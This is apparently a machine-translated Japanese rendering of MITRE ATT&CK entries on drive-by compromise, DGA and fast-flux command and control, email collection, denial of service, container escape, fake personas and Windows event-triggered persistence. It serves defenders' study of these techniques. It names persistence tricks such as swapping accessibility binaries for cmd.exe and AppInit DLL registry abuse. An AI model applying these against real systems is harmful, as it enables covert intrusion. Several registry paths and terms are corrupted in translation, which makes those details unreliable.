T1189 ドライブバイコンプロマイズ 敵対者は、ユーザが通常のブラウジングでWebサイトにアクセスすることで、システムにアクセスすることができます。この手法では、通常、ユーザーのウェブブラウザが悪用の対象となりますが、敵対者は、[Application Access Token](https://attack.mitre.org/techniques/T1550/001)の取得など、悪用以外の目的で侵害されたウェブサイトを利用することもあります。

ブラウザに悪用コードを配信する方法は、以下のように複数存在します。

* 正規のウェブサイトが侵害され、敵対者がJavaScript、iFrame、クロスサイトスクリプティングなどの悪意のあるコードを注入した場合。
* 悪意のある広告が支払われ、正規の広告プロバイダを通じて提供された場合。
* 組み込みのWebアプリケーション・インターフェースを利用して、Webコンテンツを表示したり、訪問したクライアント上で実行されるスクリプトを含むその他のあらゆる種類のオブジェクト(フォーラムの投稿、コメント、その他のユーザーが制御可能なWebコンテンツなど)を挿入します。

多くの場合、敵対者が使用するWebサイトは、政府、特定の産業、地域などの特定のコミュニティが訪問するものであり、共通の関心事に基づいて特定のユーザーまたは一連のユーザーを危険にさらすことを目的としています。このような標的型攻撃は、戦略的ウェブ侵害またはウォータリングホール攻撃と呼ばれています。引用:Shadowserver Strategic Web Compromise)

典型的なドライブ・バイ・プロブレムのプロセス:

1.ユーザーが、敵対者が管理するコンテンツをホストするために使用されているウェブサイトを訪問する。
2.スクリプトが自動的に実行され、通常はブラウザやプラグインのバージョンを検索して、脆弱性がある可能性のあるバージョンを探します。
* ユーザーは、スクリプトやアクティブなウェブサイトコンポーネントを有効にしたり、警告ダイアログボックスを無視したりして、このプロセスを支援する必要があるかもしれません。
3.脆弱性のあるバージョンが見つかると、エクスプロイトコードがブラウザに配信されます。
4.悪用が成功した場合、他の保護機能がない限り、敵対者はユーザーのシステム上でコードを実行することになります。
* 場合によっては、悪用コードが配信される前に、最初のスキャンの後に再度ウェブサイトにアクセスする必要があります。

[Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)とは異なり、この手法の焦点は、ウェブサイトにアクセスした際にクライアントのエンドポイント上のソフトウェアを悪用することです。

敵対者は、侵害されたWebサイトを利用して、OAuthトークンのような「アプリケーション・アクセス・トークンの盗用」(https://attack.mitre.org/techniques/T1528)を目的とした悪意のあるアプリケーションにユーザーを誘導し、保護されたアプリケーションや情報にアクセスさせることもあります。このような悪意のあるアプリケーションは、正規のWebサイトのポップアップを通じて配信されています(引用:Volexity OceanLotus Nov 2017)
164
T1568 ダイナミックな解像度 敵対者は、一般的な検出や修復を回避するために、コマンド&コントロール・インフラへの接続を動的に確立することがあります。これは、敵対者がマルウェアの通信を受信するために使用するインフラと共通のアルゴリズムを持つマルウェアを使用することで実現できます。

敵対者は、[Fallback Channels](https://attack.mitre.org/techniques/T1008)という目的で動的解決を使用することがあります。プライマリのコマンド&コントロールサーバーとの連絡が途絶えた場合、マルウェアはコマンド&コントロールを再確立するための手段として動的解決を採用することがあります(引用:Talos CCleanup 2017)(引用:FireEye POSHSPY April 2017)(引用:ESET Sednit 2017 Activity)
165
T1568.003 動的解決。DNSの計算 敵対者は、あらかじめ決められたポート番号や実際に返されたIPアドレスに頼るのではなく、DNSの結果として返されたアドレスに対して計算を行い、コマンド&コントロールに使用するポートとIPアドレスを決定することがあります。IPおよび/またはポート番号の計算は、C2チャネルのイグレスフィルタリングをバイパスするために使用することができます。(Citation: Meyers Numbered Panda)

[DNS Calculation](https://attack.mitre.org/techniques/T1568/003)の1つの実装は、DNS応答に含まれるIPアドレスの最初の3オクテットを取得し、それらの値を使用してコマンドアンドコントロールトラフィックのポートを計算することです。(Citation: Meyers Numbered Panda)(Citation: Moran 2014)(Citation: Rapid7G20Espionage)
166
T1568.002 動的解決。ドメイン生成アルゴリズム 敵対者は、静的なIPアドレスやドメインのリストに頼るのではなく、ドメイン生成アルゴリズム(DGA)を利用して、コマンド&コントロール・トラフィックの送信先ドメインを動的に特定することがあります。これには、マルウェアが指示を確認できるドメインが数千に及ぶ可能性があるため、防御側がコマンド&コントロール・チャネルをブロック、追跡、または乗っ取ることが非常に困難になるという利点があります。(引用:Cybereason Dissecting DGAs)(引用:Cisco Umbrella DGA)(引用:Unit 42 DGA Feb 2019)

DGAは、各文字を生成してドメイン名を構築する際に、一見ランダムまたは「ちんぷんかんぷん」な文字列(例:istgmxdejdnxuyla.ru)の形をとることがあります。また、DGA の中には、文字の代わりに単語を連結することで、単語全体を単位とするものもある(例:cityjulydish.net)。多くの DGA は時間ベースであり、各時間帯(毎時、毎日、毎月など)ごとに異なるドメイ ンを生成する。また、防御側が将来のドメインを予測することを困難にするために、シード値を組み込んでいるものもあります。(引用:Cybereason Dissecting DGAs)(引用:Cisco Umbrella DGA)(引用:Talos CCleanup 2017)(引用:Akamai DGA Mitigation)

敵対者は、[Fallback Channels](https://attack.mitre.org/techniques/T1008)の目的でDGAを使用することがあります。プライマリコマンド&コントロールサーバーとの連絡が途絶えた場合、マルウェアはコマンド&コントロールを再確立する手段としてDGAを採用することがあります(引用:Talos CCleanup 2017)(引用:FireEye POSHSPY April 2017)(引用:ESET Sednit 2017 Activity)
167
T1568.001 ダイナミック・レゾリューション。Fast Flux DNS 敵対者は、Fast Flux DNSを使用して、1つのドメイン解像度にリンクした、急速に変化するIPアドレスの配列の背後に、コマンド&コントロールチャンネルを隠すことができます。この技術では、完全修飾ドメイン名を使用し、そのドメイン名に割り当てられた複数のIPアドレスを、ラウンドロビン方式のIPアドレッシングとDNSリソースレコードの短いTTL(Time-To-Live)の組み合わせを用いて高頻度で入れ替えます。(引用:MehtaFastFluxPt1)(引用:MehtaFastFluxPt2)(引用:Fast Flux - Welivesecurity)

最もシンプルな「シングルフラックス」方式では、1つのDNS名のDNS A(アドレス)レコードリストの一部としてアドレスの登録と解除を行います。これらの登録は平均して5分間の寿命があり、その結果、IPアドレスの解決が常にシャッフルされることになります。(Citation: Fast Flux - Welivesecurity)

対照的に、「ダブルフラックス」方式では、DNSゾーンのDNSネームサーバーのレコードリストの一部としてアドレスの登録と登録解除を行い、接続の回復力を高めています。double-fluxを使用すると、追加のホストがC2ホストへのプロキシとして動作し、C2チャネルの真のソースをさらに隔離することができます。
168
T1114 メールコレクション 敵対者は、ユーザーの電子メールを標的にして機密情報を収集することがあります。電子メールには、企業秘密や個人情報など、敵対者にとって価値のある機密データが含まれている可能性があります。敵対者は、メールサーバやクライアントから電子メールを収集したり、転送したりすることができます。 169
T1114.003 メールコレクション。メール転送ルール 敵対者は、機密情報を収集するためにメール転送ルールを設定することがあります。Adversaries may abuse email-forwarding rules to monitor activities of a victim, steal information, and further gain intelligence on the victim or the victim's organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) OutlookおよびOutlook Web App (OWA)では、別の受信者への転送など、さまざまなメール機能の受信トレイルールを作成することができます。同様に、Google Workspaceのユーザーまたは管理者は、Google WorkspaceのWebインターフェースを介してメール転送ルールを設定することができます。メッセージは内部または外部の受信者に転送することができ、このルールの範囲を制限する制限はありません。また、管理者はユーザーアカウントに対する転送ルールを作成することができますが、その場合も同様の考慮と結果が得られます。(引用:Microsoft Tim McMichael Exchange Mail Forwarding 2)

組織内のあらゆるユーザーまたは管理者(または有効な認証情報を持つ敵対者)は、受信したすべてのメッセージを別の受信者に自動的に転送したり、送信者に応じて異なる場所にメールを転送したりするルールを作成することができます。
170
T1114.001 メールコレクションローカルメールコレクション 侵入者は、ローカルシステム上のユーザの電子メールを標的にして、機密情報を収集することがあります。電子メールのデータを含むファイルは、Outlookのストレージやキャッシュファイルなど、ユーザーのローカルシステムから取得することができます。

Outlookは、拡張子が.ostのオフラインデータファイルにデータをローカルに保存します。Outlook 2010以降では、.ostのファイルサイズは最大50GBをサポートしていますが、それ以前のバージョンでは最大20GBをサポートしています。(引用:Outlookのファイルサイズ)Outlook 2013(およびそれ以前)のIMAPアカウントおよびPOPアカウントでは、.ostとは対照的にOutlookデータファイル(.pst)を使用しますが、Outlook 2016(およびそれ以降)のIMAPアカウントでは.ostファイルを使用します。どちらのOutlookデータファイルも、通常は「C:Users\<username>\Documents\Outlook Files」または「C:Users%%<username>␣AppData%%Local%%Microsoft%%Outlook」に格納されています(引用:Microsoft Outlook Files)。
171
T1114.002 メールコレクション。リモートメールコレクション 敵対者は、Exchange サーバー、Office 365、または Google Workspace を標的として、機密情報を収集する可能性があります。敵対者は、ユーザーの認証情報を利用して Exchange サーバと直接やりとりし、ネットワーク内から情報を取得することがあります。また、敵対者は、外部に面したExchangeサービス、Office 365、またはGoogle Workspaceにアクセスし、認証情報やアクセストークンを使用してメールにアクセスすることができます。MailSniper](https://attack.mitre.org/software/S0413)などのツールを使って、特定のキーワードでの検索を自動化することができます。 172
T1573 暗号化されたチャンネル 敵対者は、通信プロトコル固有の保護機能に頼るのではなく、既知の暗号化アルゴリズムを用いてコマンドや制御のトラフィックを隠蔽することがあります。安全なアルゴリズムを使用しているにもかかわらず、マルウェアのサンプルや設定ファイルに秘密鍵がエンコードされたり生成されたりすると、これらの実装はリバースエンジニアリングに対して脆弱になる可能性があります。 173
T1573.002 暗号化されたチャンネル。非対称暗号方式 敵対者は、通信プロトコルが提供する固有の保護機能に頼るのではなく、既知の非対称暗号化アルゴリズムを使用して、コマンドやコントロールのトラフィックを隠蔽することができます。非対称暗号は、公開鍵暗号としても知られており、当事者ごとに、自由に配布できる公開鍵と秘密鍵のペアを使用します。鍵の生成方法により、送信者は受信者の公開鍵でデータを暗号化し、受信者は自分の秘密鍵でデータを復号化します。これにより、意図した受信者だけが暗号化されたデータを読むことができます。

効率化のため、多くのプロトコル(SSL/TLSを含む)は、接続が確立されると対称暗号を使用しますが、鍵の確立や送信には非対称暗号を使用します。そのため、これらのプロトコルは「非対称暗号」に分類されます(https://attack.mitre.org/techniques/T1573/002)。
174
T1573.001 暗号化されたチャンネル。対称型暗号方式 敵対者は、通信プロトコルが持つ固有の保護機能に頼るのではなく、既知の対称暗号化アルゴリズムを用いてコマンドやコントロールのトラフィックを隠蔽することがあります。対称型暗号化アルゴリズムは、平文の暗号化と暗号文の復号化に同じ鍵を使用します。一般的な対称暗号化アルゴリズムには、AES、DES、3DES、Blowfish、RC4などがあります。 175
T1499 エンドポイントのDenial of Service 敵対者は、エンドポイントサービス拒否(DoS)攻撃を行い、ユーザーが利用できるサービスの質を低下させたり、ブロックしたりします。エンドポイントDoSは、サービスがホストされているシステムリソースを使い切ったり、システムを悪用して永続的なクラッシュ状態を引き起こしたりすることで実行されます。サービスの例としては、Webサイト、電子メールサービス、DNS、Webベースのアプリケーションなどがあります。敵対者は、政治的な目的(引用:FireEye OpPoisonedHandover February 2016)や、撹乱(引用:FSISAC FraudNetDoS September 2012)、ハクティビズム、恐喝などの他の悪意のある活動を支援するために、DoS攻撃を行うことが確認されています(引用:Symantec DDoS October 2014)

エンドポイントDoSは、サービスへのアクセスを提供するために使用されるネットワークを飽和させることなく、サービスの利用を拒否します。敵対者は、サービスを提供するために使用されているシステム上でホストされているアプリケーションスタックのさまざまな層を標的にすることができます。これらの層には、オペレーティング・システム(OS)、ウェブ・サーバ、DNS サーバ、データベースなどのサーバ・アプリケーション、およびそれらの上にある(通常はウェブ・ベースの)アプリケーションが含まれます。各層を攻撃するには、それぞれのコンポーネントに特有のボトルネックを利用した異なる技術が必要です。

エンドポイントリソースに対してDoS攻撃を行うには、IPアドレスの詐称やボットネットなど、複数の手法に当てはまる側面があります。

敵対者は、攻撃システムのオリジナルIPアドレスを使用したり、ソースIPアドレスを詐称したりして、攻撃トラフィックから攻撃システムへの遡及を困難にしたり、リフレクションを可能にしたりします。

ボットネットは、ネットワークやサービスに対してDDoS攻撃を行う際によく利用されます。大規模なボットネットは、グローバルなインターネット上に広がるシステムから大量のトラフィックを生成することができます。敵対者は、独自のボットネットインフラを構築して制御するためのリソースを持っている場合もあれば、既存のボットネットの時間を借りて攻撃を行う場合もあります。DDoSの最悪のケースでは、非常に多くのシステムがリクエストの生成に使用されるため、それぞれのシステムが少量のトラフィックを送信するだけで、標的のリソースを使い果たすほどのボリュームになります。このような状況では、DDoSトラフィックと正当なクライアントを区別することは非常に困難になります。ボットネットは、米国の大手銀行を標的とした2012年の一連の事件など、最も注目を集めたDDoS攻撃に使用されています(引用:USNYAG IranianBotnet March 2016)

トラフィックの操作が行われる場合、グローバルネットワークの中に、パケットを改ざんし、ネットワークパケットを標的に向けて大量に送信するコードを正規のクライアントに実行させることができるポイント(トラフィックの多いゲートウェイルーターなど)が存在する可能性があります。このタイプの機能は、以前、ウェブ検閲の目的で使用されていました。クライアントのHTTPトラフィックに、ターゲットのウェブサーバーを圧倒するDDoSコードを生成するJavaScriptへの参照が含まれるように変更されていました。(引用:ArsTechnica Great Firewall of China)

提供ネットワークを飽和させようとする攻撃については、[Network Denial of Service](https://attack.mitre.org/techniques/T1498)を参照してください。
176
T1499.003 エンドポイント・デニアル・オブ・サービスアプリケーションの枯渇 洪水 敵対者は、サービス拒否(DoS)を引き起こすために、ウェブアプリケーションのリソース集中型の機能を標的にすることがあります。Web アプリケーションの特定の機能は、非常に多くのリソースを必要とする場合があります。それらの機能へのリクエストが繰り返されると、システムリソースが枯渇し、アプリケーションやサーバー自体へのアクセスが拒否される可能性があります。(引用:Arbor AnnualDoSreport Jan 2018) 177
T1499.004 エンドポイントのDenial of Serviceアプリケーションまたはシステムの悪用 敵対者はソフトウェアの脆弱性を悪用して、アプリケーションやシステムをクラッシュさせ、ユーザーの利用を拒否することがあります。(引用:Sucuri BIND9 2015年8月) システムによっては、クラッシュが発生した際に重要なアプリケーションやサービスを自動的に再起動する場合がありますが、持続的なDoS状態を引き起こすために再悪用される可能性が高いです。 178
T1499.001 エンドポイントのサービス拒否OSの枯渇による洪水 OSはシステムの有限なリソースを管理する役割を担っているため、敵対者はOSを標的にしてDoS攻撃を行うことがあります。このような攻撃では、システム上の実際のリソースを使い切る必要はありません。なぜなら、OSの容量に対する過剰な要求によってシステム全体が圧倒されないように、OSが自ら課す制限を使い切ってしまえばよいからです。

これを実現するためのさまざまな方法が存在します。SYNフラッドやACKフラッドなどのTCPステートエクスポーテーション攻撃などがあります。(Citation: Arbor AnnualDoSreport Jan 2018) SYNフラッドでは、過剰な量のSYNパケットが送信されますが、3ウェイTCPハンドシェイクは完了しません。各OSには許容できる最大同時TCP接続数があるため、これによりシステムが新たなTCP接続要求を受信する能力をすぐに使い果たしてしまい、サーバーが提供するあらゆるTCPサービスにアクセスできなくなります(引用:Cloudflare SynFlood)

ACKフラッドでは、TCPプロトコルのステートフルな性質を利用します。ACKパケットの洪水をターゲットに送信します。これにより、OSはステートテーブルを検索して、すでに確立されている関連するTCPコネクションを探すことになります。ACKパケットは存在しない接続に対するものであるため、OSは一致するものが存在しないことを確認するために、ステートテーブル全体を検索する必要があります。大量のパケットに対してこの作業を行う必要がある場合、不正なACKパケットを排除するための計算が必要となり、サーバーの動作が重くなったり、反応が悪くなったりすることがあります。これにより、目的のサービスを提供するために利用できるリソースが大幅に減少します。 (引用:Corero SYN-ACKflood)
179
T1499.002 エンドポイントのDenial of Service。サービスの枯渇 洪水 敵対者はDoSを行うために、システムが提供するさまざまなネットワークサービスを標的にすることがあります。

このタイプの攻撃の一例は、単純なHTTPフラッドとして知られており、敵対者がウェブサーバーに大量のHTTPリクエストを送信し、ウェブサーバーやその上で動作するアプリケーションを圧倒します。このフラッドは、サービスを提供するために被害者のソフトウェアが必要とするさまざまなリソースを使い果たし、目的を達成するために生のボリュームに依存しています。(引用:Cloudflare HTTPflood)

また、SSL/TLSのプロトコル機能を利用した、SSLリネゴシエーション攻撃と呼ばれるバリエーションもあります。SSL/TLSプロトコルスイートには、クライアントとサーバーが、その後のセキュアな接続に使用する暗号化アルゴリズムに合意するためのメカニズムが含まれています。SSL の再交渉が有効な場合、暗号化アルゴリズムの再交渉を要求することができます。再交渉攻撃では、攻撃者は SSL/TLS 接続を確立した後、一連の再交渉要求を行います。暗号の再交渉には計算サイクルという意味のあるコストがかかるため、大量に行われるとサービスの可用性に影響を与える可能性があります。(引用:Arbor SSLDoS April 2012
180
T1611 ホストへの脱出 敵対者は、コンテナを抜け出して、基盤となるホストにアクセスすることがあります。これにより、敵対者はホストレベルから他のコンテナ化されたリソースにアクセスしたり、ホスト自体にアクセスしたりすることができます。原則として、コンテナ化されたリソースは、アプリケーションの機能を明確に分離し、ホスト環境から隔離されている必要があります(引用:Docker Overview)

敵対者がホスト環境に脱出する方法は複数あります。例えば、bindパラメータを使用してホストのファイルシステムをマウントするように構成されたコンテナを作成することで、敵対者がペイロードを落としたり、cronなどの制御ユーティリティをホスト上で実行したりすることが可能になりますし、特権コンテナを利用して基礎となるホスト上でコマンドを実行することもできます。(引用:Docker Bind Mounts)(引用:Trend Micro Privileged Container)(引用:Intezer Doki July 20) ホストへのアクセスを獲得することで、敵対者は、パーシステンスの確立、環境内での横方向への移動、ホスト上でのコマンド&コントロール・チャネルの設定など、後続の目的を達成する機会を得ることができます。
181
T1585 アカウントの開設 敵対者は、ターゲティングの際に使用できるサービスを備えたアカウントを作成し、育成することができます。敵対者は、作戦を進めるためのペルソナの構築に利用できるアカウントを作成することができます。ペルソナの構築とは、公開情報、存在感、経歴、適切な所属先などの構築を指します。この開発は、ソーシャルメディア、ウェブサイト、またはその他の公的に利用可能な情報に適用することができ、そのペルソナやアイデンティティを使用した作戦の過程で参照し、正当性を精査することができます。(引用:NEWSCASTER2014)(引用:BlackHatRobinSage)

ソーシャルエンジニアリングを取り入れた作戦では、オンラインペルソナの利用が重要になる場合があります。このペルソナは、架空のものであったり、実在の人物になりすましたものであったりします。ペルソナは1つのサイトに存在する場合もあれば、複数のサイトにまたがって存在する場合もあります(例:Facebook、LinkedIn、Twitter、Google、GitHub、Docker Hubなど)。ペルソナを確立するには、実在しているように見せるための追加ドキュメントの作成が必要な場合があります。これには、プロフィール情報の記入、ソーシャルネットワークの構築、写真の掲載などが含まれます。(引用:NEWSCASTER2014)(引用:BlackHatRobinSage)

アカウントの確立には、メールプロバイダのアカウント作成も含まれることがあり、これが[Phishing for Information](https://attack.mitre.org/techniques/T1598)や[Phishing](https://attack.mitre.org/techniques/T1566)に直接利用されることがあります。(引用:Mandiant APT1)
182
T1585.002 アカウントを確立する。メールアカウント 敵対者は、標的化の際に使用できるメールアカウントを作成することがあります。敵対者は、メールプロバイダで作成したアカウントを、「情報提供のためのフィッシング」(https://attack.mitre.org/techniques/T1598)や「フィッシング」(https://attack.mitre.org/techniques/T1566)を行うために活用するなど、自分たちの活動を促進するために使用することができます。(引用:Mandiant APT1) また、敵対者は、後続の行動が成功する可能性を高めるために、「ソーシャルメディアアカウント」(https://attack.mitre.org/techniques/T1585/001)を使用するなどして、メールアカウントを中心としたペルソナを育成するための手段を講じることができます。作成されたメールアカウントは、インフラの獲得にも利用されることがあります(例:[Domains](https://attack.mitre.org/techniques/T1583/001))。(引用:Mandiant APT1)

物理的に自分自身にオペレーションを結びつける可能性を減らすために、敵対者は使い捨てのメールサービスを利用することがあります。(引用:Trend Micro R980 2016)
183
T1585.001 アカウントの確立ソーシャルメディアアカウント 敵対者は、ターゲティングの際に使用できるソーシャルメディアのアカウントを作成し、育成することができます。敵対者は、作戦を進めるためのペルソナの構築に使用できるソーシャルメディアのアカウントを作成することができる。ペルソナの構築とは、公開情報、存在感、経歴、適切な所属の構築である。(引用:NEWSCASTER2014)(引用:BlackHatRobinSage)

ソーシャルエンジニアリングを取り入れた作戦では、ソーシャルメディア上でのペルソナの活用が重要となる場合がある。このペルソナは、架空のものであったり、実在の人物になりすましたものであったりします。ペルソナは、1つのソーシャルメディアサイトに存在する場合もあれば、複数のサイトにまたがって存在する場合もあります(例:Facebook、LinkedIn、Twitterなど)。ソーシャルメディア上でペルソナを確立するには、実在しているように見せるための追加書類の作成が必要な場合があります。

ペルソナを確立すると、敵対者はそのペルソナを使って関心のあるターゲットとのつながりを作ることができます。これらのアカウントは、初期アクセス時(例:[Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003))など、敵対者のライフサイクルの他の段階で活用される可能性があります。
184
T1546 イベントトリガーによる実行 敵対者は、特定のイベントに基づいて実行をトリガーするシステムメカニズムを利用して、持続性の確立や特権の昇格を行うことがあります。

敵対者は、悪意のあるコードを繰り返し実行することで被害者への永続的なアクセスを維持する手段として、これらのメカニズムを悪用する可能性があります。犠牲者のシステムにアクセスした後、敵対者は、イベントトリガーが呼び出されるたびに実行される悪意のあるコンテンツを指すように、イベントトリガーを作成/修正することができます。(引用:FireEye WMI 2015)(引用:Malware Persistence on OS X)(引用:Amnesia Malware)

実行は、SYSTEMアカウントやサービスアカウントなど、より高い権限を持つアカウントによってプロキシされる可能性があるため、敵対者はこれらのトリガーによる実行メカニズムを悪用して、自分の権限を昇格させることができるかもしれません。
185
T1546.008 イベントトリガーによる実行。アクセシビリティ機能 アクセシビリティ機能を利用して悪意のあるコンテンツを実行することにより、持続性の確立や権限の昇格を引き起こす可能性があります。Windowsには、ユーザーがログインする前(例:ユーザーがWindowsのログオン画面にいるとき)に、キーの組み合わせで起動できるアクセシビリティ機能があります。

一般的なアクセシビリティ プログラムには、shift キーを 5 回押したときに起動する <code>C:Windows\\sethc.exe</code> と、Windows + U キーを押したときに起動する <code>C:Windows\utilman.exe</code> があります。このsethc.exeプログラムは、「スティッキーキー」と呼ばれることが多く、敵対者がリモートデスクトップのログイン画面からの未認証アクセスに利用しています。(引用:FireEye Hikit Rootkit)

Windowsのバージョンによって、敵対者はこれらの機能をさまざまな方法で利用する可能性があります。敵対者が使用する一般的な方法としては、レジストリ内のアクセシビリティ機能のバイナリやこれらのバイナリへのポインタ/参照を置き換えることが挙げられます。Windowsの新しいバージョンでは、置き換えられたバイナリは、x64システム用にデジタル署名されている必要があり、バイナリは<code>%systemdir%\</code>に存在し、Windows File or Resource Protection (WFP/WRP)によって保護されている必要があります。(引用:DEFCON2016 Sticky Keys) [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012)デバッガー方式は、対応するアクセシビリティ機能のバイナリを置き換える必要がないため、回避策の可能性として発見されたものと思われます。

Windows XP以降、およびWindows Server 2003/R2以降で単純にバイナリを置き換える場合は、例えば、プログラム(例:,<code>C:Windows\System32\utilman.exe</code>)を「cmd.exe」(または、バックドアアクセスを提供する他のプログラム)に置き換えることができます。その後、キーボードの前に座った状態でログイン画面で適切なキーの組み合わせを押すか、[Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)で接続すると、置き換えられたファイルがSYSTEM権限で実行されます。(引用:Tilbury 2014)

他にも、同様の方法で利用される可能性のあるアクセシビリティ機能が存在します。(引用:DEFCON2016 Sticky Keys)(引用:Narrator Accessibility Abuse)

* On-Screen Keyboard: <code>C:\\System32\osk.exe</code>
* Magnifier: <code>C:\\System32\Magnify.exe</code>
* Narrator: <code>C:\ Windows\System32\Narrator.exe</code>
* Display Switcher: <code>C:\ Windows\System32\DisplaySwitch.exe</code>
* App Switcher: <code>C:\ Windows\System32\AtBroker.exe</code>
186
T1546.009 イベントトリガーによる実行。AppCertのDLL 敵対者は、プロセスにロードされたAppCert DLLをトリガーとして悪意のあるコンテンツを実行することで、持続性を確立したり、特権を昇格させたりする可能性があります。<code>HKEY_LOCAL_MACHINESystems\CurrentControlSet\Session Manager</code>の下の<code>AppCertDLLs</code>レジストリキーで指定されたダイナミックリンクライブラリー(DLL)は、広く使われているアプリケーションプログラミングインターフェース(API)関数<code>CreateProcess</code>や<code>CreateProcessAsUser</code>を呼び出したすべてのプロセスにロードされます。<code>CreateProcess</code>、<code>CreateProcessAsUser</code>、<code>CreateProcessWithLoginW</code>、<code>CreateProcessWithTokenW</code>、<code>WinExec</code>のいずれかのAPI関数を呼び出すすべてのプロセスに読み込まれます。(引用:Elastic Process Injection 2017年7月)

[Process Injection](https://attack.mitre.org/techniques/T1055)と同様に、この値を悪用して、悪意のあるDLLをロードさせ、コンピュータ上の別のプロセスのコンテキストで実行させることで、昇格した特権を得ることができます。また、悪意のあるAppCert DLLは、APIアクティビティによって継続的にトリガーされることで、永続性を提供する可能性があります。
187
T1546.010 イベントトリガーによる実行。AppInit DLL プロセスに読み込まれたAppInit DLLをトリガーとして悪意のあるコンテンツを実行することにより、不正な持続性を確立したり、特権を昇格させたりする可能性があります。レジストリキーの <code>HKEY_LOCAL_MACHINESoftware_Microsoft_Windows NT\CurrentVersion\Windows<?または<code>HKEY_LOCAL_MACHINESoftware\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows</code>のレジストリキーの値は、user32.が user32.dll をロードするすべてのプロセスにロードされます。user32.dllは非常に一般的なライブラリなので、実際にはほとんどすべてのプログラムになります。(引用:Elastic Process Injection 2017年7月)

プロセスインジェクションと同様に、これらの値を悪用して、コンピュータ上の別のプロセスのコンテキストで悪意のあるDLLをロードして実行させることで、昇格した特権を得ることができます。(引用:AppInit Registry) 悪意のあるAppInit DLLは、APIアクティビティによって継続的にトリガーされることで、持続性を提供することもできます。

Windows 8以降のバージョンでは、セキュアブートが有効になっている場合、AppInit DLLの機能は無効になります。(引用:AppInit セキュアブート)
188
T1546.011 イベントトリガーによる実行。アプリケーション・シミング アプリケーションシムを利用して悪意のあるコンテンツを実行することにより、持続性の確立や権限の昇格を引き起こす可能性があります。Microsoft Windows Application Compatibility Infrastructure/Framework (アプリケーションシム)は、オペレーティングシステムのコードベースが時間とともに変化する中で、ソフトウェアの後方互換性を確保するために作られました。例えば、アプリケーションシムの機能により、開発者はWindows XP用に作成されたアプリケーションに(コードを書き換えることなく)Windows 10で動作するように修正を加えることができます。(引用:Elastic Process Injection 2017年7月号)

フレームワーク内では、プログラム(より具体的にはImport Address Table)とWindows OSの間のバッファとして機能するシムが作成されます。プログラムが実行されると、シムキャッシュが参照され、プログラムがシムデータベース(.sdb)の使用を必要とするかどうかが判断されます。

Windows のデフォルトのインストーラー(sdbinst.exe)によって現在インストールされているすべてのシムのリストは、

* <code>%WINDIR%AppPatch\sysmain.sdb</code> および * <code>%WINDIR%AppPatch\sysmain.sdb</code> に保管されています。sdb</code> and
* <code>hklm\software\windows nt\currentversion\appcompatflags\installedsdb</code>

カスタムデータベースは以下の場所に保存されます。

* <code>%WINDIR%\AppPatch\custom & %WINDIR%AppPatch\AppPatch64\Custom</code> および
* <code>hklm\software\microsoft\windows nturcallantversion\appcompatflags\custom</code>

シムを安全に保つために、Windows はシムをユーザーモードで実行するように設計しています。そのため、シムはカーネルを変更することができず、シムをインストールするには管理者権限が必要になります。しかし、特定のシムは、[Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE)、プロセスへのDLLの注入(InjectDLL)、データ実行防止機能の無効化(DisableNX)や構造体例外処理機能の無効化(DisableSEH)、メモリアドレスの傍受(GetProcAddress)などに使用することができます。

これらのシムを利用することで、敵対者は、特権の昇格、バックドアのインストール、Windows Defenderなどの防御機能の無効化など、いくつかの悪意ある行為を行うことができる可能性があります。(引用:FireEye Application Shimming) また、シムを悪用して、影響を受けるプログラムから継続的に呼び出されることで、持続性を確立することもできます。
189
T1546.001 イベントトリガーによる実行。デフォルトのファイルアソシエーションの変更 侵入者は、ファイルタイプの関連付けをきっかけに悪意のあるコンテンツを実行することで、持続性を確立することがあります。ファイルを開く際には、そのファイルを開くために使用されるデフォルトのプログラム(ファイルの関連付けやハンドラーとも呼ばれる)がチェックされます。ファイルの関連付けの選択は、Windowsレジストリに保存され、ユーザー、管理者、またはレジストリにアクセスできるプログラム(引用:Microsoft Change Default Programs)(引用:Microsoft File Handlers)または管理者が内蔵のassocユーティリティを使用して編集することができます。(引用:Microsoft Assoc Oct 2017) アプリケーションは、与えられたファイル拡張子のファイル関連付けを変更して、与えられた拡張子のファイルを開いたときに任意のプログラムを呼び出すことができます。

システムのファイル関連付けは、<code>HKEY_CLASSES_ROOT\.[extension]</code>の下にリストされており、例えば<code>HKEY_CLASSES_ROOT\.txt</code>のようになっています。これらのエントリは、<code>HKEY_CLASSES_ROOT\[handler]</code>にあるその拡張子のハンドラを指しています。様々なコマンドは <code>HKEY_CLASSES_ROOT\[handler]where shell\[action]wherecommand</code> にあるシェルキーの下のサブキーとしてリストアップされます。例えば、以下のようになります。
* <code>HKEY_CLASSES_ROOT\txtfile\shell\open\command</code>
* <code>HKEY_CLASSES_ROOT\txtfile\shell\print\command</code>
* <code>HKEY_CLASSES_ROOT\txtfile\shell\printto\command</code>

記載されているキーの値は、ハンドラが拡張子のファイルを開くときに実行されるコマンドです。敵対者はこれらの値を変更して、任意のコマンドを継続的に実行することができます。(引用:TrendMicro TROJ-FAKEAV OCT 2012)
190
T1546.015 イベントトリガーによる実行。コンポーネントオブジェクトモデルのハイジャック 敵対者は、COM(Component Object Model)オブジェクトへの参照を乗っ取った悪意のあるコンテンツを実行することで、持続性を確立することができます。

敵対者は、COMシステムを利用して、持続性の手段としてCOMの参照と関係をハイジャックすることにより、正規のソフトウェアの代わりに実行可能な悪意のあるコードを挿入することができます。COMオブジェクトをハイジャックするには、レジストリを変更して正規のシステムコンポーネントへの参照を置き換える必要がありますが、これによりそのコンポーネントが実行時に動作しなくなる可能性があります。通常のシステム操作でそのシステムコンポーネントが実行されると、敵対者のコードが代わりに実行されます。(引用:GDATA COM Hijacking) 敵対者は、一貫したレベルの永続性を維持するのに十分な頻度で使用されるオブジェクトをハイジャックする可能性がありますが、検知につながるようなシステムの不安定性を避けるために、システム内の顕著な機能を破壊する可能性は低いと考えられています。
191
